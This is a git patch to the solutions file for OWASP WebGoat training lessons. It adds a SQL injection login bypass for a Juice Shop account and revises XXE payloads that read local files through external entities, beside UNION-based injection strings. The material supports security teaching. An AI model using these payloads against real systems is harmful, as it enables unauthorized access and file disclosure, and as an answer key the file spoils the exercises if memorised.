From 3a9bb946edef36a644b08030f77a5d5a133bb934 Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Tue, 27 Jun 2017 08:27:06 -0400
Subject: [PATCH] update for XXE solutions

---
 webgoat-lessons/sol.txt | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/webgoat-lessons/sol.txt b/webgoat-lessons/sol.txt
index c686e4396..9fa1aa3a4 100644
--- a/webgoat-lessons/sol.txt
+++ b/webgoat-lessons/sol.txt
@@ -3,6 +3,9 @@ Basic
 Smith  - to show it returns smith's records
 Smith' or '1'='1    - to show exploit; 1=1 can be any true clause
 
+**Bender Login
+bender@juice-sh.op' --
+
 [2:19 PM]  
 101
 101 or 1=1
@@ -11,7 +14,7 @@ Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from
 
 ## XXE ##
 
-Simple - <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
+Simple <?xml version="1.0" standalone="yes" ?><!DOCTYPE comment [<!ENTITY root SYSTEM "file:///"> ]><comment>  <text>&root;</text><password>test</password></comment>
 
 Modern Rest Framework - change content type to: Content-Type: application/xml && 
 <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>